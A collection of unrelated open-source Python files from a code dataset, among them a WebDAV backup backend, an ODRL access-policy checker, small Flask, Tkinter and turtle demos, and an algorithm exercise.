1\n n_rows = int(len(twist_grids) / n_columns) + (len(twist_grids)%n_columns)\n\n # fig, axes = plt.subplots(n_rows, n_columns, sharex=True, sharey=True, figsize=(2*n_columns, 2*n_rows))\n # axes = axes.flatten()\n for filename,twist in zip(args.inputs, twist_grids):\n plt.imshow(twist.transpose())\n plt.tight_layout()\n plt.savefig(filename + \".png\")\n\n # plt.show()\n\nmain()\n","repo_name":"JamieJQuinn/field-line-integrator","sub_path":"visualise_twist.py","file_name":"visualise_twist.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34132835659","text":"import base64\nimport httplib\nimport re\nimport urllib\nimport urllib2\nimport xml.dom.minidom\n\nimport duplicity.backend\nfrom duplicity import globals\nfrom duplicity import log\nfrom duplicity.errors import * #@UnusedWildImport\nfrom duplicity import urlparse_2_5 as urlparser\n\nclass CustomMethodRequest(urllib2.Request):\n \"\"\"\n This request subclass allows explicit specification of\n the HTTP request method. Basic urllib2.Request class\n chooses GET or POST depending on self.has_data()\n \"\"\"\n def __init__(self, method, *args, **kwargs):\n self.method = method\n urllib2.Request.__init__(self, *args, **kwargs)\n\n def get_method(self):\n return self.method\n\n\nclass WebDAVBackend(duplicity.backend.Backend):\n \"\"\"Backend for accessing a WebDAV repository.\n\n webdav backend contributed in 2006 by Jesper Zedlitz \n \"\"\"\n listbody = \"\"\"\\\n\n\n\n\n\n\"\"\"\n\n \"\"\"Connect to remote store using WebDAV Protocol\"\"\"\n def __init__(self, parsed_url):\n duplicity.backend.Backend.__init__(self, parsed_url)\n self.headers = {'Connection': 'keep-alive'}\n self.parsed_url = parsed_url\n self.digest_challenge = None\n self.digest_auth_handler = None\n\n if parsed_url.path:\n foldpath = re.compile('/+')\n self.directory = foldpath.sub('/', parsed_url.path + '/' )\n else:\n self.directory = '/'\n\n log.Info(\"Using WebDAV host %s\" % (parsed_url.hostname,))\n log.Info(\"Using WebDAV port %s\" % (parsed_url.port,))\t\n log.Info(\"Using WebDAV directory %s\" % (self.directory,))\n log.Info(\"Using WebDAV protocol %s\" % (globals.webdav_proto,))\n\n if parsed_url.scheme == 'webdav':\n self.conn = httplib.HTTPConnection(parsed_url.hostname, parsed_url.port)\n elif parsed_url.scheme == 'webdavs':\n self.conn = httplib.HTTPSConnection(parsed_url.hostname, parsed_url.port)\n else:\n raise BackendException(\"Unknown URI scheme: %s\" % (parsed_url.scheme))\n\n def _getText(self,nodelist):\n rc = \"\"\n for node in nodelist:\n if node.nodeType == node.TEXT_NODE:\n rc = rc + node.data\n return rc\n\n def close(self):\n self.conn.close()\n\n def request(self, method, path, data=None):\n \"\"\"\n Wraps the connection.request method to retry once if authentication is\n required\n \"\"\"\n quoted_path = urllib.quote(path)\n\n if self.digest_challenge is not None:\n self.headers['Authorization'] = self.get_digest_authorization(path)\n self.conn.request(method, quoted_path, data, self.headers)\n response = self.conn.getresponse()\n if response.status == 401:\n response.close()\n self.headers['Authorization'] = self.get_authorization(response, quoted_path)\n self.conn.request(method, quoted_path, data, self.headers)\n response = self.conn.getresponse()\n\n return response\n\n def get_authorization(self, response, path):\n \"\"\"\n Fetches the auth header based on the requested method (basic or digest)\n \"\"\"\n try:\n auth_hdr = response.getheader('www-authenticate', '')\n token, challenge = auth_hdr.split(' ', 1)\n except ValueError:\n return None\n if token.lower() == 'basic':\n return self.get_basic_authorization()\n else:\n self.digest_challenge = self.parse_digest_challenge(challenge)\n return self.get_digest_authorization(path)\n\n def parse_digest_challenge(self, challenge_string):\n return urllib2.parse_keqv_list(urllib2.parse_http_list(challenge_string))\n\n def get_basic_authorization(self):\n \"\"\"\n Returns the basic auth header\n \"\"\"\n auth_string = '%s:%s' % (self.parsed_url.username, self.get_password())\n return 'Basic %s' % base64.encodestring(auth_string).strip()\n\n def get_digest_authorization(self, path):\n \"\"\"\n Returns the digest auth header\n \"\"\"\n u = self.parsed_url\n if self.digest_auth_handler is None:\n pw_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()\n pw_manager.add_password(None, self.conn.host, u.username, self.get_password())\n self.digest_auth_handler = urllib2.HTTPDigestAuthHandler(pw_manager)\n\n # building a dummy request that gets never sent,\n # needed for call to auth_handler.get_authorization\n scheme = u.scheme == 'webdavs' and 'https' or 'http'\n hostname = u.port and \"%s:%s\" % (u.hostname, u.port) or u.hostname\n dummy_url = \"%s://%s%s\" % (scheme, hostname, path)\n dummy_req = CustomMethodRequest(self.conn._method, dummy_url)\n auth_string = self.digest_auth_handler.get_authorization(dummy_req, self.digest_challenge)\n return 'Digest %s' % auth_string\n\n def list(self):\n \"\"\"List files in directory\"\"\"\n for n in range(1, globals.num_retries+1):\n log.Info(\"Listing directory %s on WebDAV server\" % (self.directory,))\n self.headers['Depth'] = \"1\"\n response = self.request(\"PROPFIND\", self.directory, self.listbody)\n del self.headers['Depth']\n # if the target collection does not exist, create it.\n if response.status == 404:\n log.Info(\"Directory '%s' being created.\" % self.directory)\n res = self.request(\"MKCOL\", self.directory)\n log.Info(\"WebDAV MKCOL status: %s %s\" % (res.status, res.reason))\n continue\n if response.status == 207:\n document = response.read()\n break\n log.Info(\"WebDAV PROPFIND attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n if n == globals.num_retries +1:\n log.Warn(\"WebDAV backend giving up after %d attempts to PROPFIND %s\" % (globals.num_retries, self.directory))\n raise BackendException((response.status, response.reason))\n\n log.Info(\"%s\" % (document,))\n dom = xml.dom.minidom.parseString(document)\n result = []\n for href in dom.getElementsByTagName('d:href') + dom.getElementsByTagName('D:href'):\n filename = self.__taste_href(href)\n if filename:\n result.append(filename)\n return result\n\n def __taste_href(self, href):\n \"\"\"\n Internal helper to taste the given href node and, if\n it is a duplicity file, collect it as a result file.\n\n @return: A matching filename, or None if the href did not match.\n \"\"\"\n raw_filename = self._getText(href.childNodes).strip()\n parsed_url = urlparser.urlparse(urllib.unquote(raw_filename))\n filename = parsed_url.path\n log.Debug(\"webdav path decoding and translation: \"\n \"%s -> %s\" % (raw_filename, filename))\n\n # at least one WebDAV server returns files in the form\n # of full URL:s. this may or may not be\n # according to the standard, but regardless we\n # feel we want to bail out if the hostname\n # does not match until someone has looked into\n # what the WebDAV protocol mandages.\n if not parsed_url.hostname is None \\\n and not (parsed_url.hostname == self.parsed_url.hostname):\n m = \"Received filename was in the form of a \"\\\n \"full url, but the hostname (%s) did \"\\\n \"not match that of the webdav backend \"\\\n \"url (%s) - aborting as a conservative \"\\\n \"safety measure. If this happens to you, \"\\\n \"please report the problem\"\\\n \"\" % (parsed_url.hostname,\n self.parsed_url.hostname)\n raise BackendException(m)\n\n if filename.startswith(self.directory):\n filename = filename.replace(self.directory,'',1)\n return filename\n else:\n return None\n\n def get(self, remote_filename, local_path):\n \"\"\"Get remote filename, saving it to local_path\"\"\"\n url = self.directory + remote_filename\n target_file = local_path.open(\"wb\")\n for n in range(1, globals.num_retries+1):\n log.Info(\"Retrieving %s from WebDAV server\" % (url ,))\n response = self.request(\"GET\", url)\n if response.status == 200:\n target_file.write(response.read())\n assert not target_file.close()\n local_path.setdata()\n return\n log.Info(\"WebDAV GET attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n log.Warn(\"WebDAV backend giving up after %d attempts to GET %s\" % (globals.num_retries, url))\n raise BackendException((response.status, response.reason))\n\n def put(self, source_path, remote_filename = None):\n \"\"\"Transfer source_path to remote_filename\"\"\"\n if not remote_filename:\n remote_filename = source_path.get_filename()\n url = self.directory + remote_filename\n source_file = source_path.open(\"rb\")\n for n in range(1, globals.num_retries+1):\n log.Info(\"Saving %s on WebDAV server\" % (url ,))\n response = self.request(\"PUT\", url, source_file.read())\n if response.status == 201:\n response.read()\n assert not source_file.close()\n return\n log.Info(\"WebDAV PUT attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n log.Warn(\"WebDAV backend giving up after %d attempts to PUT %s\" % (globals.num_retries, url))\n raise BackendException((response.status, response.reason))\n\n def delete(self, filename_list):\n \"\"\"Delete files in filename_list\"\"\"\n for filename in filename_list:\n url = self.directory + filename\n for n in range(1, globals.num_retries+1):\n log.Info(\"Deleting %s from WebDAV server\" % (url ,))\n response = self.request(\"DELETE\", url)\n if response.status == 204:\n response.read()\n break\n log.Info(\"WebDAV DELETE attempt #%d failed: %s %s\" % (n, response.status, response.reason))\n if n == globals.num_retries +1:\n log.Warn(\"WebDAV backend giving up after %d attempts to DELETE %s\" % (globals.num_retries, url))\n raise BackendException((response.status, response.reason))\n\nduplicity.backend.register_backend(\"webdav\", WebDAVBackend)\nduplicity.backend.register_backend(\"webdavs\", WebDAVBackend)\n","repo_name":"hcarvalhoalves/duplicity","sub_path":"duplicity/backends/webdavbackend.py","file_name":"webdavbackend.py","file_ext":"py","file_size_in_byte":10736,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"53"} +{"seq_id":"23241014965","text":"# 给你一个字符串 s,找到 s 中最长的回文子串。\n\ns = \"babad\"\ns = \"cbbd\"\ns = \"aacabdkacaa\"\n# 动态规划,记录s[i:j]是否回文\ndef longestPalindrome(s):\n dp = [[0] * len(s) for _ in range(len(s))]\n maxL = 1\n maxI = 0\n maxJ = 0\n\n for i in range(len(s)):\n dp[i][i] = 1\n for i in range(len(s) - 2, -1, -1):\n for j in range(i + 1, len(s)):\n if s[i] == s[j]:\n if j == i + 1:\n dp[i][j] = 2\n else:\n if dp[i + 1][j - 1] != 0:\n dp[i][j] = dp[i + 1][j - 1] + 2\n if dp[i][j] > maxL:\n maxL = dp[i][j]\n maxI = i\n maxJ = j\n print(dp)\n return s[maxI:maxJ + 1]\n\nprint(longestPalindrome(s))","repo_name":"vandeppce/algorithm","sub_path":"10.dynamic programming/5*LongestPalindrome.py","file_name":"5*LongestPalindrome.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21058225226","text":"import os\nfrom werkzeug.wsgi import DispatcherMiddleware\nfrom paste.cgiapp import CGIApplication\nfrom path import path\nfrom webob.dec import wsgify\n\n\nVIEWER_HOME = path(__file__).abspath().parent / 'maps'\n\n\ndef create_mapserver_app():\n mapserv_cgi = CGIApplication({}, os.environ.get('MAPSERV_BIN', 'mapserv'))\n\n @wsgify\n def mapserv_wrapper(request):\n request.GET['map'] = VIEWER_HOME / 'money.map'\n request.GET['SRS'] = 'EPSG:3857'\n return request.get_response(mapserv_cgi)\n\n return mapserv_wrapper\n\n\ndef initialize(app):\n app.wsgi_app = DispatcherMiddleware(app.wsgi_app, {\n '/mapserv': create_mapserver_app(),\n })\n","repo_name":"mgax/agripay","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23671102858","text":"from enthought.traits.api import HasTraits, Bool\nfrom enthought.traits.ui.api import View, Handler\n\n#--[Code]-----------------------------------------------------------------------\n\nclass TC_Handler(Handler):\n\n def setattr(self, info, object, name, value):\n Handler.setattr(self, info, object, name, value)\n info.object._updated = True\n\n def object__updated_changed(self, info):\n if info.initialized:\n info.ui.title += \"*\"\n\nclass TestClass(HasTraits):\n b1 = Bool\n b2 = Bool\n b3 = Bool\n _updated = Bool(False)\n\nview1 = View('b1', 'b2', 'b3', \n title=\"Alter Title\", \n handler=TC_Handler(),\n buttons = ['OK', 'Cancel'])\n\ntc = TestClass()\ntc.configure_traits(view=view1)\n\n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/Traits/examples/tutorials/doc_examples/examples/handler_override.py","file_name":"handler_override.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"235349423","text":"# # person class\n\n# ----------------------------------------\n\n# class Person(object):\n# \tdef __init__(self, name, age):\n# \t\tself.name = name;\n# \t\tself.age = age;\n# \t\tself.known = [];\n\n\n# \tdef know(self, person):\n# \t\tself.known.append(person);\n\n# \tdef is_known(self, person):\n# \t\tprint('known' if bool(self.known.count(person)) else 'unknown');\t\n\n\n# person1 = Person('alex', 19);\n\n# person2 = Person('alice', 20);\n\n# person3 = Person('mike', 30);\n\n# person1.know(person2);\n\n# person1.is_known(person2);\n\n# person1.is_known(person3);\n\n# person1.know(person3);\n\n# person1.is_known(person3);\n# person2.is_known(person3);\n\n# ----------------------------------\n\n# printer class\n\n# ----------------------------------\n\n# class Printer(object):\n# \tdef __init__(self):\n# \t\tvalues_list = [];\n\n# \tdef log(self, *values):\n# \t\tvalues_list = [item for item in values];\n# \t\tprint(' '.join(values_list));\n\n\n# class FormatedPrinter(Printer):\n# \tdef form_log(self, *values):\n# \t\tprint('*********************');\n# \t\tself.log(*values);\t\t\t\n# \t\tprint('*********************');\n\n\n# form = FormatedPrinter();\n# form.form_log('2','3','4');\t\t\n\n# -----------------------------------------\n\n# animals and humans\n\n# -----------------------------------------\n\nclass Animal(object):\n\t\n\tdef __init__(self, aggression = False):\n\t\tself.aggression = aggression;\n\nclass Human(object):\n\n\tdef is_dangerous(self, animal):\n\t\tprint('dangerous' if animal.aggression else 'not dangerous');\t\t\n\n\ntiger = Animal(True);\nhorse = Animal(False);\n\njohn = Human();\n\njohn.is_dangerous(tiger);\njohn.is_dangerous(horse);","repo_name":"beLemoth/pythonTpl","sub_path":"les5.py","file_name":"les5.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27867919813","text":"#Modulo\n#Chamando somente a funcao partial\nfrom functools import partial\nfrom tkinter import *\n\n#Chamando a janela\naba = Tk()\n\n#Geometry\naba.geometry(\"300x200+100+100\")\n\n#Criando uma definicao generica de chamada\n#Como funciona: O bt vai ser chamado do botao com a chamada e o text vai receber o text ue o botao esta vinculado\n#Definicao\ndef botao(bt):\n lb['text'] = bt['text']\n\n#Caso voce tente usar o command para definir o result do Def vai dar erro pois voce esta tentado evocar a funcao e nao linkar\n\n#Botao\n#Reescrevendo uma chamada com partial\n#BT1\nbt1 = Button(aba, width=20, text='BT1')\n#Reescrevendo o valor, defenicao e depois o valor dela(No caso o Botao e seu valor em TEXT)\n#Correto\nbt1['command'] = partial(botao, bt1)\n#Errado\n#bt1['command'] = botao(bt1): Isso é evocar a funcao o que dara um erro caso tente\nbt1.place(x=50, y=50)\n\n#BT2\nbt2 = Button(aba, width=20, text='BT2')\n#Reescrevendo o valor, defenicao e depois o valor dela(No caso o Botao e seu valor em TEXT)\nbt2['command'] = partial(botao, bt2)\nbt2.place(x=50, y=80)\n\n#Label\nlb = Label(aba, text='Sem chamada')\nlb.place(x=50, y=110)\n \n#Chamando a janela\naba.mainloop()\n","repo_name":"guilhermeG23/AulasPythonGuanabara","sub_path":"Tkinter/IntroducaoDeEventos2.py","file_name":"IntroducaoDeEventos2.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18602308960","text":"from flask import Flask\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n html_string = \"

Hello, World

\"\n html_string1 = \"

My name is Maheen

\"\n return html_string + html_string1\n\n@app.route('/portfolio')\ndef portfolio ():\n my_projects = \"

My Projects

\"\n list_of_projects = \"
  • My trip
  • Chicago Life
\"\n return my_projects + list_of_projects\n\n@app.route('/about/')\ndef about (person):\n about_me = \"

I am 21 years old and learning how to code

\"\n return about_me\napp.run(debug=True)","repo_name":"mhn-mnsr/DojoAssignments","sub_path":"Python/hello_flask/portfolio.py","file_name":"portfolio.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23726317804","text":"from urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom urllib.error import URLError\nfrom bs4 import BeautifulSoup\n\n\ndef get_title(url):\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n\n try:\n bs = BeautifulSoup(html.read(), \"html.parser\")\n tittle = bs.body.h1\n except AttributeError as e:\n return None\n\n return tittle\n\n\ntittle = get_title(\"https://www.pythonscraping.com/pages/page1.html\")\n\nif tittle is None:\n print(\"Tittle could be not be found.\")\nelse:\n print(tittle)\n","repo_name":"welderessutti/exercises_and_studies","sub_path":"web_scraping_with_python_book/scraptest.py","file_name":"scraptest.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14635863570","text":"import logging\nimport pathlib\nimport posixpath\nimport pprint\nimport urllib.parse\nfrom collections import namedtuple\n\nimport colorama\nimport rdflib\nimport rdflib.plugins.sparql as sparql\nfrom rdflib import URIRef\n\nif __package__:\n from .namespaces import ODRL\n from .namespaces import MOSAICROWN\nelse:\n from mosaicrown.namespaces import ODRL\n from mosaicrown.namespaces import MOSAICROWN\n\n\ncolorama.init(autoreset=True)\n\n\ndef get_objects(graph, predicate, subject=None):\n \"\"\"Return a set of all the objects that match a predicate (and subject).\n\n :graph: The policy graph.\n :predicate: The predicate of the rules to match.\n :subject: The subject of the rules to match (defaults to any).\n :return: A set of all the objects that match the parameters in the graph.\n \"\"\"\n triples = graph.triples((subject, predicate, None))\n return set(obj for (subj, pred, obj) in triples)\n\n\ndef get_subjects(graph, predicate, object=None):\n \"\"\"Return a set of all the subjects that match a predicate (and object).\n\n :graph: The policy graph.\n :predicate: The predicate of the rules to match.\n :object: The object of the rules to match (defaults to any).\n :return: A set of all the subjects that match the parameters in the graph.\n \"\"\"\n triples = graph.triples((None, predicate, object))\n return set(subj for (subj, pred, obj) in triples)\n\n\ndef get_targets(graph):\n \"\"\"Return a set of all the odrl:target in the policy.\n\n :graph: The policy graph.\n :return: A set of all the odrl:target in the policy.\n \"\"\"\n return get_objects(graph, ODRL.target)\n\n\ndef get_assignee(graph):\n \"\"\"Return a set of all the odrl:assignee in the policy.\n\n :graph: The policy graph.\n :return: A set of all the odrl:assignee in the policy.\n \"\"\"\n return get_objects(graph, ODRL.assignee)\n\n\ndef generate_subpaths(iri):\n \"\"\"Generate all subpaths from an IRI string.\n\n :iri: An IRI string.\n :yield: A list of subpaths from the parent to the children.\n \"\"\"\n scheme, netloc, path, query, fragment = urllib.parse.urlsplit(iri)\n parent = urllib.parse.urlunsplit((scheme, netloc, \"/\", None, None))\n path = pathlib.PurePosixPath(path)\n\n # Iterate over the path parts (separated by \"/\").\n for part in path.parts:\n # Yields a path without the trailing \"/\".\n parent = urllib.parse.urljoin(parent, part)\n yield parent\n # Adds the trailing \"/\" for subsequent iterations.\n parent = urllib.parse.urljoin(parent, part + \"/\")\n\n\ndef add_iri_hierarchy_to_graph(graph, iri, predicate, reverse=False):\n \"\"\"Parse an IRI string and adds a dependency predicate to its parts.\n\n For instance, using the IRI \"http://example.com/A/B\" the following\n triples are added to the graph:\n\n (\"http://example.com/\", predicate, \"http://example.com/A\" )\n (\"http://example.com/A\", predicate, \"http://example.com/A/B\")\n\n :graph: The policy graph.\n :iri: An IRI string.\n :predicate: The predicate that will be used to generate the triples.\n :reverse: If reverse is True, the triples subject and object are swapped.\n \"\"\"\n paths = [rdflib.URIRef(path) for path in generate_subpaths(iri)]\n for parent, child in zip(paths, paths[1:]):\n subj, obj = (child, parent) if reverse else (parent, child)\n logging.debug(f\"Adding ({subj}, {predicate}, {obj})\")\n graph.add((subj, predicate, obj))\n\n\ndef get_target_constraints(graph, target):\n \"\"\"Recover constraints of rules having the specified URI as target.\n\n :graph: The policy graph.\n :target: The IRI string of the target.\n :return: The list of constraints on the given target.\n \"\"\"\n operand_types = [URIRef(\"http://www.w3.org/ns/odrl/2/and\"), URIRef(\"http://www.w3.org/ns/odrl/2/or\")]\n operand_type = \", \".join((\"<{}>\".format(o_type) for o_type in operand_types))\n\n regex = f\"http://((.)+/)?{target}\"\n # SPARQL query to recover the constraints inside a rule\n # To not use the REGEX remove FILTER REGEX(STR(?target),\"{regex}\", \"i\")\n query_string = f\"\"\"\n SELECT DISTINCT ?leftOperand ?operator ?rightOperand ?type ?operand ?logcon\n WHERE {{\n {{\n ?rule odrl:target ?target.\n FILTER REGEX(STR(?target),\"{regex}\", \"i\")\n ?policy ?type ?rule.\n ?rule odrl:constraint ?con.\n ?con odrl:leftOperand ?leftOperand.\n ?con odrl:operator ?operator.\n ?con odrl:rightOperand ?rightOperand\n }} UNION\n {{\n ?rule odrl:target ?target.\n FILTER REGEX(STR(?target),\"{regex}\", \"i\")\n ?policy ?type ?rule.\n ?rule odrl:constraint ?logcon.\n ?logcon ?operand ?con.\n ?con odrl:leftOperand ?leftOperand.\n ?con odrl:operator ?operator.\n ?con odrl:rightOperand ?rightOperand\n FILTER (?operand IN ({operand_type}))\n }}\n }}\n \"\"\"\n # Recover only the constraint of the rules having the correct target\n bindings = {\n \"target\": rdflib.URIRef(target)\n }\n # Setup namespaces of the policy\n namespaces = {\"odrl\": ODRL, \"mosaicrown\": MOSAICROWN}\n\n query = sparql.prepareQuery(query_string, initNs=namespaces)\n # To use bindings instead of REGEX graph.query(query, initBindings=bindings)\n return graph.query(query)\n\n\ndef get_all_policy_rules_by_type(graph, rule_types=None):\n\n if not rule_types or len(rule_types) == 0:\n return None\n\n types = \", \".join((\"<{}>\".format(type) for type in rule_types))\n\n # SPARQL query to recover all the rules inside the policy graph\n queryString = \"\"\"\n SELECT DISTINCT ?rule ?target ?assignee ?action ?purpose\n WHERE {{\n ?policy ?predicate ?rule.\n ?rule odrl:target ?target.\n ?rule odrl:assignee ?assignee.\n ?rule odrl:action ?action.\n ?rule mosaicrown:purpose ?purpose\n FILTER (?predicate IN ({type}))\n }}\n \"\"\".format(type=types)\n\n namespaces = {\"odrl\": ODRL, \"mosaicrown\": MOSAICROWN}\n query = sparql.prepareQuery(queryString, initNs=namespaces)\n result = graph.query(query)\n Rule = namedtuple('Rule', 'URI target assignee action purpose')\n ruleDict = {}\n\n for row in result:\n if row[0] in ruleDict:\n ruleDict[row[0]].append(Rule(*row))\n else:\n ruleDict[row[0]] = [Rule(*row)]\n ruleSet = set()\n for rows in ruleDict.values():\n targets = tuple(row.target for row in rows)\n ruleSet.add(Rule(rows[0].URI, targets, rows[0].assignee, rows[0].action, rows[0].purpose))\n\n return ruleSet\n\n\ndef get_rules(graph, targets, assignee, action, purpose, pred, ns=None,\n expand_graph=True):\n \"\"\"Get the rules that assign the predicate `pred` to the assignee over\n the dictionary of targets (a map between table IRIs and accessed columns).\n\n :graph: The policy graph.\n :targets: A dictionary that maps table IRIs to accessed columns.\n :assignee: The user who is requesting the access.\n :action: The action that the user wants to perform.\n :purpose: The purpose for the access.\n :pred: The predicate that defines the rules that we are interested in.\n :ns: The dictionary of namespaces to add to the default ODRL one.\n :expand_graph: If True, introduces new hierarchical predicates on the\n IRI received as parameters (defaults to True).\n :return: A dictionary that maps table IRIs to the rules that involve the\n requested columns (as specified in the `targets` dictionary).\n \"\"\"\n\n if expand_graph:\n add_iri_hierarchy_to_graph(graph, assignee, ODRL.belongsTo, True)\n add_iri_hierarchy_to_graph(graph, purpose, ODRL.partOf, True)\n\n # TODO: move namespaces updates to the reasoners when available.\n # Generate the namespaces to be used in the query.\n namespaces = {\"odrl\": ODRL, \"mosaicrown\": MOSAICROWN}\n if ns:\n namespaces.update(ns)\n\n # Create the query.\n queryString = \"\"\"\n SELECT DISTINCT ?rule\n WHERE {\n ?policy ?predicate ?rule .\n ?rule odrl:assignee ?assigneeRec .\n ?assignee mosaicrown:belongsTo* ?assigneeRec .\n ?rule odrl:action ?actionRec .\n ?action odrl:includedIn* ?actionRec .\n ?rule odrl:target ?targetRec .\n ?target odrl:partOf* ?targetRec .\n ?rule mosaicrown:purpose ?purposeRec .\n ?purpose mosaicrown:declinationOf* ?purposeRec .\n }\n \"\"\"\n query = sparql.prepareQuery(queryString, initNs=namespaces)\n\n # Prepare the result dictionary.\n rules = {}\n\n # Iterate over the tables and find a rule that has predicate on the\n # columns.\n for table_IRI in targets:\n column_rules = {}\n\n for column_name in targets[table_IRI]:\n column_IRI = rdflib.URIRef(posixpath.join(table_IRI, column_name))\n\n if expand_graph:\n add_iri_hierarchy_to_graph(graph, column_IRI,\n ODRL.partOf, True)\n\n bindings = {\n \"predicate\": pred,\n \"action\": action,\n \"target\": column_IRI,\n \"assignee\": assignee,\n \"purpose\": purpose\n }\n\n # Extract the rule uids that has predicate on the column.\n result = graph.query(query, initBindings=bindings)\n\n column_rules[column_IRI] = set(row[0] for row in result)\n\n # Add the column rules to the dictionary of table rules.\n rules[table_IRI] = column_rules\n\n return rules\n\n\ndef check_permission(graph, targets, assignee, action, purpose, ns=None,\n expand_graph=True):\n \"\"\"Check if the requested access complies with the policy.\n\n :graph: The policy graph.\n :targets: A dictionary that maps table IRIs to accessed columns.\n :assignee: The user who is requesting the access.\n :action: The action that the user wants to perform.\n :purpose: The purpose for the access.\n :ns: The dictionary of namespaces to add to the default ODRL one.\n :expand_graph: If True, introduces new hierarchical predicates on the\n IRI received as parameters (defaults to True).\n :return: A dictionary that maps table IRIs to a set of policy uids that\n grant the access, or None if the access does not comply with the\n policy.\n \"\"\"\n rules = get_rules(\n graph=graph,\n targets=targets,\n assignee=assignee,\n action=action,\n purpose=purpose,\n pred=ODRL.permission,\n ns=ns,\n expand_graph=expand_graph)\n\n # For each table, get the intersection of the permission rules, since for\n # each table we want to find a permission rule that grants the join\n # visibility over all the accessed columns.\n join_permission_rules = {\n table_IRI: set.intersection(*rules[table_IRI].values())\n for table_IRI in rules}\n\n # If all the accessed table have at least one join permission rule (the\n # intersection is not empty), then return them, otherwise return None,\n # to state that the access does not comply with the policy.\n if all(join_permission_rules.values()):\n return join_permission_rules\n return None\n\n\ndef check_prohibition(graph, targets, assignee, action, purpose, ns=None,\n expand_graph=True):\n \"\"\"Check if the requested access is forbidden explicitly by the policy.\n This check only verifies if there is a prohibition rule that explicitly\n denies the visibility of the requested targets to the assignee. Even\n if the policy does not explicitly denies the access, it does not mean\n that there is a permission rule that grants it, so it is important to\n always check for positive permissions also.\n\n :graph: The policy graph.\n :targets: A dictionary that maps table IRIs to accessed columns.\n :assignee: The user who is requesting the access.\n :action: The action that the user wants to perform.\n :purpose: The purpose for the access.\n :ns: The dictionary of namespaces to add to the default ODRL one.\n :expand_graph: If True, introduces new hierarchical predicates on the\n IRI received as parameters (defaults to True).\n :return: A dictionary that maps table IRIs to a set of policy uids that\n deny the access, or None if the access does is not explicitly denied.\n \"\"\"\n rules = get_rules(\n graph=graph,\n targets=targets,\n assignee=assignee,\n action=action,\n purpose=purpose,\n pred=ODRL.prohibition,\n ns=ns,\n expand_graph=expand_graph)\n\n # For each table, get the intersection of the permission rules, since for\n # each table we want to find a permission rule that grants the join\n # visibility over all the accessed columns.\n prohibition_rules = {\n table_IRI: set.union(*rules[table_IRI].values())\n for table_IRI in rules}\n\n # If any of the accessed table have at least one prohibition rule on one\n # of the accessed columns, return the rules that deny the access, otherwise\n # return None, to state that the access is not explicitly denied.\n if any(prohibition_rules.values()):\n return prohibition_rules\n return None\n\n\ndef check_access(graph, targets, assignee, action, purpose, ns=None,\n expand_graph=True):\n \"\"\"Check if the requested access is both:\n\n * not explicitly denied by a prohibition rule.\n * explicitly granted by a permission rule.\n\n :graph: The policy graph.\n :targets: A dictionary that maps table IRIs to accessed columns.\n :assignee: The user who is requesting the access.\n :action: The action that the user wants to perform.\n :purpose: The purpose for the access.\n :ns: The dictionary of namespaces to add to the default ODRL one.\n :expand_graph: If True, introduces new hierarchical predicates on the\n IRI received as parameters (defaults to True).\n :return: True if granted, False if denied (or not granted).\n \"\"\"\n\n print(colorama.Fore.CYAN + \"\\n[*] Testing access\")\n print(\"\\tAssignee:\", assignee, sep=\"\\t\")\n print(\"\\tAction:\\t\", action, sep=\"\\t\")\n print(\"\\tTargets:\", pprint.pformat(targets), sep=\"\\t\")\n print(\"\\tPurpose:\", purpose, sep=\"\\t\")\n\n prohibitions = check_prohibition(\n graph=graph,\n targets=targets,\n assignee=assignee,\n action=action,\n purpose=purpose,\n ns=ns,\n expand_graph=expand_graph)\n\n if prohibitions:\n print(\n colorama.Fore.RED +\n f\"[*] Access prohibited by: {pprint.pformat(prohibitions)}\")\n return False\n else:\n print(colorama.Fore.YELLOW + \"Access not prohibited\")\n\n permissions = check_permission(\n graph=graph,\n targets=targets,\n assignee=assignee,\n action=action,\n purpose=purpose,\n ns=ns,\n expand_graph=expand_graph)\n\n if permissions:\n print(colorama.Fore.GREEN + \"Access permitted:\")\n for k in permissions:\n print(colorama.Fore.GREEN + \"\\ttarget:\\t\\t\" + k)\n print(colorama.Fore.GREEN +\n \"\\tperm. rules:\\t\" +\n pprint.pformat(permissions[k]))\n return True\n else:\n print(\n colorama.Fore.RED +\n f\"Access not explicitly permitted -> denied.\")\n return False\n","repo_name":"mosaicrown/policy-engine","sub_path":"mosaicrown/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17815535025","text":"import turtle\n\ndef draw_square():\n\n # Setting a window with the background colored red\n window = turtle.Screen()\n window.bgcolor('red')\n\n # Move a turtle named brad forward\n brad = turtle.Turtle()\n\n # Customize the turtle\n brad.shape(\"turtle\")\n brad.color('yellow')\n brad.speed(2)\n\n brad.forward(100)\n\n # Turn Brad right 90 degrees and move forward\n brad.right(90)\n brad.forward(100)\n\n brad.right(90)\n brad.forward(100)\n\n brad.right(90)\n brad.forward(100)\n\n 